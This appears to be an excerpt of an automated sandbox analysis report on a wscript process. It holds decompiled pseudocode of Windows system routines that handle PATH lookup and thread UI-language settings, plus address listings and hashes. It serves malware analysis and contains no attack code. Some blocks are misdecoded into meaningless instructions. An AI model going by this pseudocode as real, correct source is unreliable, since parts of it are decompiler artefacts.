									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t311 =  &_v64;
								_v80 = E05972E3E(0,  &_v64);
								_t284 = _t284 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x5a38480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x5a38480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0595EEF0(0x5a379a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0595EB70(__ecx, 0x5a379a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t212 = _v72;
											__eflags = _t212;
											if(_t212 != 0) {
												L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t212);
											}
											_t213 = _v52;
											__eflags = _t213;
											if(_t213 != 0) {
												__eflags = _t332;
												if(_t332 < 0) {
													L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t213);
													_t213 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t291 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x5a37b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L05964620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0595EB70(__ecx, 0x5a379a0);
										__eax = _v52;
										L36:
										_pop(_t323);
										_pop(_t333);
										__eflags = _v8 ^ _t337;
										_pop(_t285);
										return E0598B640(_t213, _t285, _v8 ^ _t337, _t311, _t323, _t333);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t280 = _v56;
								if(_v56 != 0) {
									_t311 =  &_v36;
									_t282 = E05972E3E(_t280,  &_v36);
									_t291 = _v36;
									_v76 = _t282;
								}
								if(_t291 == 0) {
									goto L44;
								} else {
									_t284 = _t284 + 2 + _t291;
								}
								goto L14;
							case 6:
								__eax =  *0x5a35764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x5a38478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x5a38478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x5a36e58 & 0x0000ffff;
								__eax = ( *0x5a36e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t322 = _t322 + 1;
								if(_t322 >= _v48) {
									goto L16;
								} else {
									_t311 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_push(0x25);
					asm("int 0x29");
					asm("out 0x28, al");
					asm("loopne 0x29");
					_t326 = _t324 + 0x5972866;
					_t334 = _t331 + 1;
					 *((intOrPtr*)(_t326 - 0x68d9fafb)) =  *((intOrPtr*)(_t326 - 0x68d9fafb)) - _t311;
					_t342 = _t238 + 0xb32814d;
					 *((intOrPtr*)(_t326 - 0x64a4cafb)) =  *((intOrPtr*)(_t326 - 0x64a4cafb)) - _t311;
					 *((char*)(_t340 + 0x5972902)) =  *((char*)(_t340 + 0x5972902)) - 0x97;
					_push(ds);
					 *((intOrPtr*)(_t326 - 0x68d7b1fb)) =  *((intOrPtr*)(_t326 - 0x68d7b1fb)) - _t311;
					asm("fcomp dword [ebx-0x65]");
					asm("wait");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x5a1ff00);
					E0599D08C(_t284, _t326, _t334);
					_v44 =  *[fs:0x18];
					_t327 = 0;
					 *_a24 = 0;
					_t288 = _a12;
					__eflags = _t288;
					if(_t288 == 0) {
						_t253 = 0xc0000100;
					} else {
						_v8 = 0;
						_t335 = 0xc0000100;
						_v52 = 0xc0000100;
						_t255 = 4;
						while(1) {
							_v40 = _t255;
							__eflags = _t255;
							if(_t255 == 0) {
								break;
							}
							_t301 = _t255 * 0xc;
							_v48 = _t301;
							__eflags = _t288 -  *((intOrPtr*)(_t301 + 0x5921664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t270 = E0598E5C0(_a8,  *((intOrPtr*)(_t301 + 0x5921668)), _t288);
									_t342 = _t342 + 0xc;
									__eflags = _t270;
									if(__eflags == 0) {
										_t335 = E059C51BE(_t288,  *((intOrPtr*)(_v48 + 0x592166c)), _a16, _t327, _t335, __eflags, _a20, _a24);
										_v52 = _t335;
										break;
									} else {
										_t255 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t255 = _t255 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t335;
						__eflags = _t335;
						if(_t335 < 0) {
							__eflags = _t335 - 0xc0000100;
							if(_t335 == 0xc0000100) {
								_t297 = _a4;
								__eflags = _t297;
								if(_t297 != 0) {
									_v36 = _t297;
									__eflags =  *_t297 - _t327;
									if( *_t297 == _t327) {
										_t335 = 0xc0000100;
										goto L76;
									} else {
										_t313 =  *((intOrPtr*)(_v44 + 0x30));
										_t257 =  *((intOrPtr*)(_t313 + 0x10));
										__eflags =  *((intOrPtr*)(_t257 + 0x48)) - _t297;
										if( *((intOrPtr*)(_t257 + 0x48)) == _t297) {
											__eflags =  *(_t313 + 0x1c);
											if( *(_t313 + 0x1c) == 0) {
												L106:
												_t335 = E05972AE4( &_v36, _a8, _t288, _a16, _a20, _a24);
												_v32 = _t335;
												__eflags = _t335 - 0xc0000100;
												if(_t335 != 0xc0000100) {
													goto L69;
												} else {
													_t327 = 1;
													_t297 = _v36;
													goto L75;
												}
											} else {
												_t260 = E05956600( *(_t313 + 0x1c));
												__eflags = _t260;
												if(_t260 != 0) {
													goto L106;
												} else {
													_t297 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t335 = E05972C50(_t297, _a8, _t288, _a16, _a20, _a24, _t327);
											L76:
											_v32 = _t335;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0595EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t335 = _a24;
									_t267 = E05972AE4( &_v36, _a8, _t288, _a16, _a20, _t335);
									_v32 = _t267;
									__eflags = _t267 - 0xc0000100;
									if(_t267 == 0xc0000100) {
										_v32 = E05972C50(_v36, _a8, _t288, _a16, _a20, _t335, 1);
									}
									_v8 = _t327;
									E05972ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t253 = _t335;
					}
					L70:
					return E0599D0D1(_t253);
				}
				L108:
			}

0x05972584
0x05972586
0x05972590
0x05972596
0x05972597
0x05972598
0x05972599
0x0597259e
0x059725a4
0x059725a9
0x059725ac
0x059725ae
0x059725b1
0x059725b2
0x059725b5
0x059725b8
0x059725bb
0x059725bc
0x059725bf
0x059725c2
0x059725c5
0x059725c6
0x059725cb
0x059725ce
0x059725d8
0x059725dd
0x059725de
0x059725e1
0x059725e3
0x059725e9
0x059726da
0x059726da
0x059726dd
0x059726e2
0x059b5b56
0x00000000
0x059726e8
0x059726f9
0x059726fb
0x059726fe
0x05972700
0x059b5b60
0x00000000
0x05972706
0x05972706
0x0597270a
0x0597270a
0x0597270d
0x05972713
0x05972716
0x05972718
0x0597271c
0x0597271e
0x059b5b6c
0x059b5b6f
0x059b5b7f
0x059b5b89
0x059b5b8e
0x059b5b93
0x059b5b96
0x059b5b9c
0x059b5ba0
0x059b5ba3
0x059b5bab
0x059b5bb0
0x059b5bb3
0x059b5bb3
0x059b5ba3
0x05972724
0x05972726
0x05972729
0x0597272c
0x0597279d
0x0597279d
0x059727a0
0x059727a2
0x00000000
0x0597272e
0x0597272e
0x05972731
0x05972734
0x05972734
0x05972736
0x059b5bc1
0x059b5bc1
0x059b5bc4
0x00000000
0x059b5bca
0x059b5bca
0x059b5bcd
0x00000000
0x059b5bd3
0x00000000
0x059b5bd3
0x059b5bcd
0x0597273c
0x0597273c
0x05972742
0x05972747
0x0597274a
0x0597274d
0x05972750
0x00000000
0x05972756
0x05972756
0x00000000
0x05972902
0x05972908
0x0597290b
0x00000000
0x05972911
0x0597291c
0x05972921
0x00000000
0x05972921
0x00000000
0x00000000
0x05972880
0x05972887
0x0597288c
0x00000000
0x00000000
0x05972805
0x0597280a
0x05972814
0x05972816
0x00000000
0x00000000
0x0597281e
0x05972821
0x05972823
0x00000000
0x05972829
0x05972829
0x05972831
0x0597283c
0x0597283e
0x00000000
0x0597283e
0x00000000
0x00000000
0x0597284e
0x05972850
0x05972851
0x05972854
0x05972857
0x0597285a
0x0597285c
0x0597285d
0x00000000
0x00000000
0x0597275d
0x05972761
0x00000000
0x05972767
0x0597276e
0x05972773
0x05972773
0x05972776
0x05972778
0x0597277e
0x0597277e
0x05972781
0x05972781
0x05972783
0x05972784
0x00000000
0x00000000
0x059b5bd8
0x059b5bde
0x059b5be4
0x059b5be6
0x059b5be8
0x059b5be9
0x059b5bee
0x059b5bf8
0x059b5bff
0x059b5c01
0x059b5c04
0x059b5c07
0x059b5c0b
0x059b5c0d
0x059b5c0d
0x059b5c15
0x059b5c18
0x059b5c1b
0x059b5c1b
0x059b5c1e
0x00000000
0x00000000
0x059728c3
0x059728c8
0x059728d2
0x059728d4
0x059728d8
0x059728db
0x059b5c26
0x059b5c28
0x059b5c2d
0x059b5c2d
0x00000000
0x00000000
0x059b5c34
0x059b5c36
0x059b5c49
0x059b5c4e
0x059b5c54
0x059b5c5b
0x059b5c5d
0x059b5c60
0x05972788
0x05972788
0x0597278b
0x0597278e
0x0597278e
0x0597278e
0x05972791
0x00000000
0x00000000
0x05972756
0x05972750
0x00000000
0x05972794
0x05972794
0x05972795
0x05972798
0x05972798
0x00000000
0x05972734
0x0597272c
0x05972700
0x059725ef
0x059725ef
0x059725ef
0x059725f2
0x059725f8
0x00000000
0x00000000
0x059725fe
0x00000000
0x059728e6
0x059728ec
0x059728ef
0x059728f5
0x059728f8
0x059728f8
0x00000000
0x059728f8
0x00000000
0x00000000
0x05972866
0x05972866
0x05972876
0x05972879
0x00000000
0x00000000
0x059727e0
0x059727e7
0x059727e9
0x059727eb
0x059b5afd
0x00000000
0x059b5afd
0x00000000
0x00000000
0x05972633
0x05972638
0x0597263b
0x0597263c
0x0597263e
0x05972640
0x05972642
0x05972647
0x05972649
0x0597264e
0x05972650
0x05972653
0x05972659
0x059726a2
0x059726a7
0x059726ac
0x059726b2
0x059b5b11
0x059b5b15
0x059b5b17
0x00000000
0x059726b8
0x059726b8
0x059726ba
0x059727a6
0x059727a6
0x059727a9
0x059727ab
0x059727b9
0x059727b9
0x059727be
0x059727c1
0x059727c3
0x059727c5
0x059727c7
0x059b5c74
0x059b5c79
0x059b5c79
0x059727c7
0x00000000
0x059726c0
0x059726c0
0x059726c3
0x059726c6
0x059726c6
0x059726c9
0x059726c9
0x00000000
0x059726c9
0x059726ba
0x0597265b
0x0597265b
0x0597265e
0x05972667
0x0597266d
0x05972677
0x0597267c
0x0597267f
0x05972681
0x059b5b49
0x059b5b4e
0x059727cd
0x059727d0
0x059727d1
0x059727d2
0x059727d4
0x059727dd
0x05972687
0x05972687
0x0597268a
0x0597268b
0x0597268e
0x0597268f
0x05972691
0x05972696
0x05972698
0x0597269d
0x0597269f
0x00000000
0x0597269f
0x05972681
0x00000000
0x00000000
0x05972846
0x00000000
0x00000000
0x05972605
0x0597260a
0x0597260c
0x05972611
0x05972616
0x05972619
0x05972619
0x0597261e
0x00000000
0x05972624
0x05972627
0x05972627
0x00000000
0x00000000
0x059b5b1f
0x00000000
0x00000000
0x05972894
0x0597289b
0x0597289d
0x059728a1
0x059b5b2b
0x059b5b2e
0x059b5b2e
0x059728a7
0x059728a9
0x059b5b04
0x059b5b09
0x059b5b09
0x059b5b09
0x00000000
0x00000000
0x059b5b35
0x059b5b3c
0x059728fb
0x059728fb
0x059726cc
0x059726cc
0x059726d0
0x00000000
0x059726d2
0x059726d2
0x00000000
0x059726d2
0x00000000
0x00000000
0x059725fe
0x0597292d
0x0597292d
0x05972930
0x05972935
0x0597293d
0x0597293f
0x05972945
0x05972946
0x05972951
0x05972952
0x0597295d
0x05972965
0x05972966
0x05972971
0x0597297b
0x05972981
0x05972982
0x05972983
0x05972984
0x05972985
0x05972986
0x05972987
0x05972988
0x05972989
0x0597298a
0x0597298b
0x0597298c
0x0597298d
0x0597298e
0x0597298f
0x05972990
0x05972992
0x05972997
0x059729a3
0x059729a6
0x059729ab
0x059729ad
0x059729b0
0x059729b2
0x059b5c80
0x059729b8
0x059729b8
0x059729bb
0x059729c0
0x059729c5
0x059729c6
0x059729c6
0x059729c9
0x059729cb
0x00000000
0x00000000
0x059729cd
0x059729d0
0x059729d9
0x059729db
0x059729dd
0x05972a7f
0x05972a84
0x05972a87
0x05972a89
0x059b5ca1
0x059b5ca3
0x00000000
0x05972a8f
0x05972a8f
0x00000000
0x05972a8f
0x00000000
0x059729e3
0x059729e3
0x059729e3
0x00000000
0x059729e3
0x059729dd
0x00000000
0x059729db
0x059729e6
0x059729e9
0x059729eb
0x059729ed
0x059729f3
0x059729f5
0x059729f8
0x059729fa
0x05972a97
0x05972a9a
0x05972a9d
0x05972add
0x00000000
0x05972a9f
0x05972aa2
0x05972aa5
0x05972aa8
0x05972aab
0x059b5cab
0x059b5caf
0x059b5cc5
0x059b5cda
0x059b5cdc
0x059b5cdf
0x059b5ce5
0x00000000
0x059b5ceb
0x059b5ced
0x059b5cee
0x00000000
0x059b5cee
0x059b5cb1
0x059b5cb4
0x059b5cb9
0x059b5cbb
0x00000000
0x059b5cbd
0x059b5cbd
0x00000000
0x059b5cbd
0x059b5cbb
0x05972ab1
0x05972ab1
0x05972ac4
0x05972ac6
0x05972ac6
0x00000000
0x05972ac6
0x05972aab
0x00000000
0x05972a00
0x05972a09
0x05972a0e
0x05972a21
0x05972a24
0x05972a35
0x05972a3a
0x05972a3d
0x05972a42
0x05972a59
0x05972a59
0x05972a5c
0x05972a5f
0x05972a5f
0x059729fa
0x059729f3
0x05972a64
0x05972a64
0x05972a6b
0x05972a6b
0x05972a6d
0x05972a72
0x05972a72
0x00000000

Strings

PATH, xrefs: 05972642, 05972691

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: d416c57eea2bff0c7a2fdc4a96f791b5474d5d5b80544b84b04bc7856d0e0463
Instruction ID: 74e2e9d84092ce55fcee042742105885797a8a7fea960bdcdb307f107ebb1776
Opcode Fuzzy Hash: d416c57eea2bff0c7a2fdc4a96f791b5474d5d5b80544b84b04bc7856d0e0463
Instruction Fuzzy Hash: 0CC1B0B5E24219DBDF14DF98D981BBEB7B5FF88700F48446AF801AB250E734A941CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0597FAB0 Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0597FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0595EEF0(0x5a37b60);
					_t134 =  *0x5a37b84; // 0x77997b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x5a37b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x5a37b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E05956D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E059576E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E059E8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0594B150();
													}
													_t116 = E059E6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E059575CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x5a38638; // 0x2a81dd8
																	_t122 = L059538A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E059576E2(_t154);
																			goto L41;
																		}
																	} else {
																		E059576E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0597FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L059570F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0597FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0597FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0597FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0597FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0597FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x5a37b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x5a37b84 = _t75;
						_t73 = E0595EB70(_t134, 0x5a37b60);
						if( *0x5a37b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0595FF60( *0x5a37b20);
							}
						}
						goto L5;
					}
				}
			}

0x0597fab0
0x0597fab2
0x0597fab3
0x0597fab4
0x0597fabc
0x0597fac0
0x0597fb14
0x0597fb17
0x0597fac2
0x0597fac8
0x0597facd
0x0597fad3
0x0597fad3
0x0597fadd
0x0597fb18
0x0597fb1b
0x0597fb1d
0x0597fb1e
0x0597fb1f
0x0597fb20
0x0597fb21
0x0597fb22
0x0597fb23
0x0597fb24
0x0597fb25
0x0597fb26
0x0597fb27
0x0597fb28
0x0597fb29
0x0597fb2a
0x0597fb2b
0x0597fb2c
0x0597fb2d
0x0597fb2e
0x0597fb2f
0x0597fb3a
0x0597fb3b
0x0597fb3e
0x0597fb41
0x0597fb44
0x0597fb47
0x0597fb4a
0x0597fb4d
0x0597fb53
0x059bbdcb
0x059bbdcb
0x0597fb59
0x0597fb5b
0x0597fb5b
0x0597fb5e
0x059bbdd5
0x059bbdd8
0x00000000
0x059bbdda
0x00000000
0x059bbdda
0x0597fb64
0x0597fb64
0x0597fb64
0x0597fb67
0x0597fb6e
0x0597fb70
0x0597fb72
0x00000000
0x0597fb78
0x0597fb7a
0x0597fb7a
0x0597fb7d
0x0597fb80
0x059bbddf
0x059bbde1
0x00000000
0x059bbde3
0x00000000
0x059bbde3
0x0597fb86
0x0597fb86
0x0597fb86
0x0597fb8b
0x0597fb90
0x0597fb92
0x0597fb94
0x0597fb9a
0x0597fb9b
0x0597fba1
0x059bbde8
0x059bbdeb
0x059bbded
0x059bbeb5
0x059bbeb5
0x059bbebb
0x059bbebd
0x059bbec3
0x059bbed2
0x059bbedd
0x059bbedd
0x059bbeed
0x00000000
0x059bbdf3
0x059bbdfe
0x059bbe06
0x059bbe0b
0x059bbe0d
0x059bbe0f
0x059bbe14
0x059bbe19
0x059bbe20
0x059bbe25
0x059bbe27
0x059bbe35
0x059bbe39
0x059bbe46
0x059bbe4f
0x059bbe54
0x059bbe56
0x059bbef8
0x059bbef8
0x00000000
0x059bbe5c
0x059bbe5c
0x059bbe60
0x00000000
0x059bbe66
0x059bbe66
0x059bbe7f
0x059bbe84
0x059bbe87
0x059bbe89
0x059bbe8b
0x059bbe99
0x059bbe9d
0x059bbea0
0x059bbeac
0x059bbeaf
0x059bbeb1
0x059bbeb3
0x059bbeb3
0x00000000
0x059bbea2
0x059bbea2
0x00000000
0x059bbea2
0x059bbe8d
0x059bbe8d
0x059bbe92
0x00000000
0x059bbe92
0x059bbe8b
0x059bbe60
0x059bbe3b
0x059bbe3b
0x059bbe3e
0x00000000
0x059bbe40
0x059bbe40
0x059bbe44
0x00000000
0x00000000
0x00000000
0x00000000
0x059bbe44
0x059bbe3e
0x059bbe29
0x059bbe29
0x00000000
0x059bbe29
0x059bbe27
0x00000000
0x0597fba7
0x0597fba7
0x0597fbab
0x059bbf02
0x0597fbb1
0x0597fbb1
0x0597fbb8
0x0597fbbd
0x0597fbbd
0x0597fbbf
0x0597fbbf
0x0597fbc5
0x0597fbcb
0x0597fbf8
0x0597fbf8
0x0597fbfa
0x00000000
0x0597fc00
0x0597fc00
0x0597fc03
0x00000000
0x0597fc09
0x0597fc09
0x0597fc0f
0x0597fc15
0x0597fc23
0x0597fc23
0x0597fc25
0x0597fc27
0x0597fc75
0x0597fc7c
0x0597fc84
0x00000000
0x0597fc29
0x0597fc29
0x0597fc2d
0x0597fc30
0x059bbf0f
0x00000000
0x0597fc36
0x0597fc38
0x0597fc3b
0x0597fc41
0x059bbf17
0x059bbf19
0x059bbf48
0x059bbf4b
0x00000000
0x059bbf1b
0x059bbf22
0x059bbf24
0x059bbf26
0x00000000
0x059bbf2c
0x059bbf37
0x059bbf39
0x059bbf3b
0x00000000
0x059bbf41
0x059bbf41
0x059bbf41
0x059bbf41
0x059bbf45
0x00000000
0x059bbf45
0x059bbf3b
0x059bbf26
0x00000000
0x0597fc47
0x0597fc47
0x0597fc49
0x0597fcb2
0x0597fcb4
0x0597fcb6
0x0597fcdc
0x0597fcdc
0x00000000
0x0597fcb8
0x0597fcc3
0x0597fcc5
0x0597fcc7
0x00000000
0x0597fcc9
0x0597fcc9
0x0597fccd
0x00000000
0x0597fccd
0x0597fcc7
0x00000000
0x0597fc4b
0x0597fc4b
0x0597fc4e
